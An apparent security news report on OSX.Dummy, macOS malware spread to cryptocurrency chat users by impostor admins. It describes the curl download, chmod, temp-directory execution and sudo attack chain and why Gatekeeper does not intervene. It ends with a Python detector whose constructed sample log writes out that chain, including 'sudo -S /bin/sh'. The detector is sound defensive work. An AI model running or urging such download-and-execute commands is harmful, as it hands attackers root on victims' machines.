Criminals using a piece of macOS malware called OSX.Dummy appear to be targeting cryptocurrency investors who gather in Discord and Slack chat groups. OSX.Dummy isn't a sophisticated piece of software, but once it is running on a machine it lets its operator execute arbitrary commands there.
Security researchers first found evidence of the malware a few days ago. Remco Verhoef reported his findings on the SANS Internet Storm Center blog on Friday, noting a series of attacks against macOS users during the preceding week.
Members of cryptocurrency chat groups on Slack and Discord have reported accounts impersonating group administrators and well-known community figures. Because the people being impersonated are known for sharing useful cryptocurrency tools, the impostors find it easier to persuade legitimate users to install harmful code.
Users are then talked into pasting a short command line into a terminal. It uses the curl command-line tool to download a much larger, roughly 34 megabyte file containing the OSX.Dummy binary. The attackers save the download to a temporary directory, a location every user can write to, so no special Unix permissions are needed to drop the file and mark it executable.
Because it is an ordinary 64-bit Mach-O binary, it runs natively on macOS. Online multi-engine malware scanning services did not yet flag it as a threat at the time, which may be inadvertently helping the attackers convince users that the file is safe.
Normally, Gatekeeper would block an unsigned binary like the OSX.Dummy payload from launching. Gatekeeper, however, only inspects downloads that carry the com.apple.quarantine extended attribute, which browsers and other quarantine-aware apps attach to the files they save; curl does not set it, and a file executed directly from a terminal is never checked. Because the attack relies on the victim typing commands at a shell prompt, the Mac raises no warning at all.
The binary then invokes sudo, which prompts the user for their administrator password just as it would on a GNU/Linux system. Once the password is supplied, the malware runs as root and has full access to the file system.
The malware then connects to a command-and-control (C2) server, giving the attacker remote control of the host. OSX.Dummy also writes the password the victim typed to a file in a temporary directory for later use.
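The chain described above (curl download into a temp directory, chmod +x, execution from the terminal, then sudo) is easy to spot in process-start telemetry because every step is an ordinary command with a recognisable argument. The following detector is an added example and is not code from the original article or from the researchers who analysed the malware. Its record format (tab-separated epoch seconds, uid, pid, ppid, working directory and command line) and all of the sample records, including the example.invalid URLs, are constructed for the example; real telemetry would come from an EDR agent or the macOS Endpoint Security framework.

```python
"""
Correlating the OSX.Dummy infection chain in process-start telemetry.

Added example, not code from the original article or from the malware's analysts.
The record format and every sample record are constructed for this example.
"""
import os
import shlex
from dataclasses import dataclass

# User-writable locations where the lure drops its payload (no privileges needed there).
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
WINDOW_SECONDS = 600  # the chain is pasted as one line, so its steps land within minutes


@dataclass
class Event:
    ts: int      # epoch seconds
    uid: int
    pid: int
    ppid: int
    cwd: str
    argv: list


def parse_log(text: str) -> list:
    """Parse one constructed process-start record per line, oldest first."""
    events = []
    for line in text.strip().splitlines():
        ts, uid, pid, ppid, cwd, cmd = line.split("\t", 5)
        events.append(Event(int(ts), int(uid), int(pid), int(ppid), cwd, shlex.split(cmd)))
    return sorted(events, key=lambda e: e.ts)


def makes_executable(mode: str) -> bool:
    """True for symbolic modes that add x (+x, u+x, a+rx) or octal modes with an x bit set.
    '=' assignments such as u=rwx are not handled; extend here if your fleet uses them."""
    if mode.isdigit():
        return int(mode, 8) & 0o111 != 0
    return any("x" in part.split("+", 1)[1] for part in mode.split(",") if "+" in part)


def session_root(ev: Event, by_pid: dict) -> int:
    """Walk up the parent chain to the first process not in the log: the user's shell.
    This keeps the payload's own child (sudo) in the same session as the pasted commands."""
    pid = ev.pid
    for _ in range(64):  # bound the walk in case pids were recycled
        if pid not in by_pid:
            return pid
        pid = by_pid[pid].ppid
    return pid


def detect_dummy_chain(events: list) -> list:
    """
    Flag each shell session in which, within WINDOW_SECONDS: curl ran; chmod made a file
    under a temp directory executable; that file was then executed; and, optionally, sudo
    ran underneath it. The path is taken from chmod rather than curl because a shell
    redirect ('curl ... > script') never appears in curl's own argv.
    Returns (shell_pid, uid, executed_path, sudo_seen) for every flagged session.
    """
    by_pid = {ev.pid: ev for ev in events}
    sessions = {}
    for ev in events:
        sessions.setdefault(session_root(ev, by_pid), []).append(ev)

    findings = []
    for shell_pid, evs in sessions.items():
        curl_ts, marked, executed, sudo_seen = None, {}, None, False
        for ev in evs:
            if not ev.argv:
                continue
            prog = os.path.basename(ev.argv[0])
            if prog == "curl":
                curl_ts = ev.ts
            elif prog == "chmod" and curl_ts is not None and ev.ts - curl_ts <= WINDOW_SECONDS:
                args = [a for a in ev.argv[1:] if not a.startswith("-")]
                if len(args) >= 2 and makes_executable(args[0]):
                    for target in args[1:]:
                        full = os.path.normpath(os.path.join(ev.cwd, target))
                        if full.startswith(TEMP_PREFIXES):
                            marked[full] = ev.ts
            elif prog == "sudo":
                sudo_seen = sudo_seen or executed is not None
            else:
                full = os.path.normpath(os.path.join(ev.cwd, ev.argv[0]))
                if full in marked and ev.ts - marked[full] <= WINDOW_SECONDS:
                    executed = full
        if executed is not None:
            findings.append((shell_pid, evs[0].uid, executed, sudo_seen))
    return findings


# Constructed sample: one malicious session (shell pid 4100) and one benign one (5200).
SAMPLE_LOG = """\
1530000000\t501\t4101\t4100\t/tmp\tcurl -s http://example.invalid/script -o script
1530000004\t501\t4102\t4100\t/tmp\tchmod +x script
1530000005\t501\t4103\t4100\t/tmp\t./script
1530000006\t501\t4104\t4103\t/tmp\tsudo -S /bin/sh
1530000300\t501\t5201\t5200\t/Users/alice\tcurl -s https://example.invalid/notes.txt -o notes.txt
1530000302\t501\t5202\t5200\t/Users/alice\tchmod 644 notes.txt
1530000310\t501\t5203\t5200\t/Users/alice\tless notes.txt
"""

if __name__ == "__main__":
    for shell_pid, uid, path, sudo in detect_dummy_chain(parse_log(SAMPLE_LOG)):
        print(f"shell {shell_pid} (uid {uid}) ran {path} from a temp dir; sudo afterwards: {sudo}")
```

The benign session is ignored because chmod 644 adds no execute bit and nothing is run from a temp directory; the malicious one is reported with sudo_seen set to True because the sudo call is attributed to the same shell session even though its parent is the payload, not the shell. Widening TEMP_PREFIXES to other user-writable paths, or requiring a file-write event from curl instead of the time anchor used here, are the obvious tuning knobs.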